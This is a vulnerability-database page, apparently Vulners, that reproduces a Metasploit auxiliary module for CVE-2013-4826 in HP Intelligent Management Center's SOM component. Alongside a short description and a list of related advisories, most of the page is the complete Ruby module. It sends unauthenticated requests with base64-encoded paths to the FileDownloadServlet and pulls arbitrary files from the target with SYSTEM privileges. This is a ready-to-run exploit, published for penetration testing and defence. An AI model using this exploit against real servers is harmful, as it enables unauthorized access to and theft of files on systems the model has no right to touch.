Lucene search
K

HP Intelligent Management SOM FileDownloadServlet Arbitrary Download

🗓️ 23 Oct 2013 16:24:29Reported by rgod <[email protected]>, juan vazquez <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 31 Views

HP Intelligent Management SOM FileDownloadServlet Arbitrary Download module exploits a lack of authentication and access control in HP Intelligent Management, specifically in the FileDownloadServlet from the SOM component, in order to retrieve arbitrary files with SYSTEM privileges. It has been tested successfully on HP Intelligent Management Center 5.2_E0401 with SOM 5.2 E0401 over Windows 2003 SP2

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2013-4826
29 May 201815:50
circl
Check Point Advisories
HP Intelligent Management Center SOM sdFileDownload Information Disclosure (CVE-2013-4826)
2 Dec 201300:00
checkpoint_advisories
CVE
CVE-2013-4826
13 Oct 201310:00
cve
Cvelist
CVE-2013-4826
13 Oct 201310:00
cvelist
Tenable Nessus
HP Intelligent Management Center SOM Module < 7.0 E0101 Multiple Vulnerabilities
9 Jan 201400:00
nessus
Tenable Nessus
HP Intelligent Management Center SOM Module Information Disclosure
9 Jan 201400:00
nessus
NVD
CVE-2013-4826
13 Oct 201310:20
nvd
Packet Storm
HP Intelligent Management SOM FileDownloadServlet Arbitrary Download
1 Sep 202400:00
packetstorm
Prion
Code injection
13 Oct 201310:20
prion
RedhatCVE
CVE-2013-4826
22 May 202502:38
redhatcve
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP Intelligent Management SOM FileDownloadServlet Arbitrary Download',
      'Description'    => %q{
          This module exploits a lack of authentication and access control in HP Intelligent
        Management, specifically in the FileDownloadServlet from the SOM component, in order to
        retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully
        on HP Intelligent Management Center 5.2_E0401 with SOM 5.2 E0401 over Windows 2003 SP2.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-4826' ],
          [ 'OSVDB', '98251' ],
          [ 'BID', '62898' ],
          [ 'ZDI', '13-242' ]
        ]
    ))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
        OptString.new('FILEPATH', [true, 'The path of the file to download', 'c:\\windows\\win.ini'])
      ])
  end

  def is_imc_som?
    res = send_request_cgi({
      'uri'      => normalize_uri("servicedesk", "ServiceDesk.jsp"),
      'method'   => 'GET'
    })

    if res and res.code == 200 and res.body =~ /servicedesk\/servicedesk/i
      return true
    else
      return false
    end
  end

  def my_basename(filename)
    return ::File.basename(filename.gsub(/\\/, "/"))
  end

  def run_host(ip)

    unless is_imc_som?
      vprint_error("HP iMC with the SOM component not found")
      return
    end

    vprint_status("Sending request...")
    res = send_request_cgi({
      'uri'          => normalize_uri("servicedesk", "servicedesk", "fileDownload"),
      'method'       => 'GET',
      'vars_get'     =>
        {
          'OperType' => '2',
          'fileName' => Rex::Text.encode_base64(my_basename(datastore['FILEPATH'])),
          'filePath' => Rex::Text.encode_base64(datastore['FILEPATH'])
        }
    })

    if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] =~ /application\/doc/
      contents = res.body
      fname = my_basename(datastore['FILEPATH'])
      path = store_loot(
        'hp.imc.somfiledownloadservlet',
        'application/octet-stream',
        ip,
        contents,
        fname
      )
      print_good("File saved in: #{path}")
    else
      vprint_error("Failed to retrieve file")
      return
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation